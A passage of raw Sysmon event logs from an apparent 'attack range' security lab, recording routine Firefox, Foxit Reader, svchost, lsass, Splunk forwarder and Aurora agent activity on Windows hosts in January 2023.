Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:57.155{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:57.123{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85CC6FD074BF94714C65638DA799B6A3,SHA256=7F65519AA57D07AE179089FC3F7D798F0FDC8EA51289E51C02F1C1988DC9218C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016743Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:55.108{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50107-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 354300x800000000000000016745Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:55.890{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:10fd:2a95:f5ff:fef0win-host-ctus-attack-range-933546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 10341000x800000000000000043421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.996{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.996{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.996{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.952{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.947{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.947{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.915{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.915{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.915{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.914{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.914{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.914{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000043409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.898{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B2945731F91A6D27AB181C5526DFDE5,SHA256=2F98077ED7F6564A4B77A1840A05CFB753570604C342A4116E0450C711CC31E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.837{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.821{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+b7bc2c|C:\Program Files\Mozilla Firefox\xul.dll+b7b970|C:\Program Files\Mozilla Firefox\xul.dll+283bd30|C:\Program Files\Mozilla Firefox\xul.dll+25060b4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a9651a|C:\Program Files\Mozilla Firefox\xul.dll+17d2563|C:\Program Files\Mozilla Firefox\xul.dll+1a96c19|C:\Program Files\Mozilla Firefox\xul.dll+3bb937d|C:\Program Files\Mozilla Firefox\xul.dll+f87be3|C:\Program Files\Mozilla Firefox\xul.dll+f86c65|C:\Program Files\Mozilla Firefox\xul.dll+f821a4|C:\Windows\System32\user32.dll+121e4|C:\Windows\System32\user32.dll+11b2c|C:\Program Files\Mozilla Firefox\xul.dll+193aa18|C:\Program Files\Mozilla Firefox\xul.dll+17e4953|C:\Program Files\Mozilla Firefox\xul.dll+1ac0339|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1 10341000x800000000000000043406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.775{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:58.775{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.1.75608265C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.775{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406716C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:58.775{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko-crash-server-pipe.3240C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000043402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.759{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\cache2\doomed\21804MD5=478838B7D7CA3CF2FA70F530AA874D55,SHA256=650F04C7FF88FFE2A20832490CB38FB9A3789D31F1F8C6894A7CB644595C6881,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.759{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\cookies.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.743{FE4C2B44-E4A2-63C7-4806-00000000AF02}32407044C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program 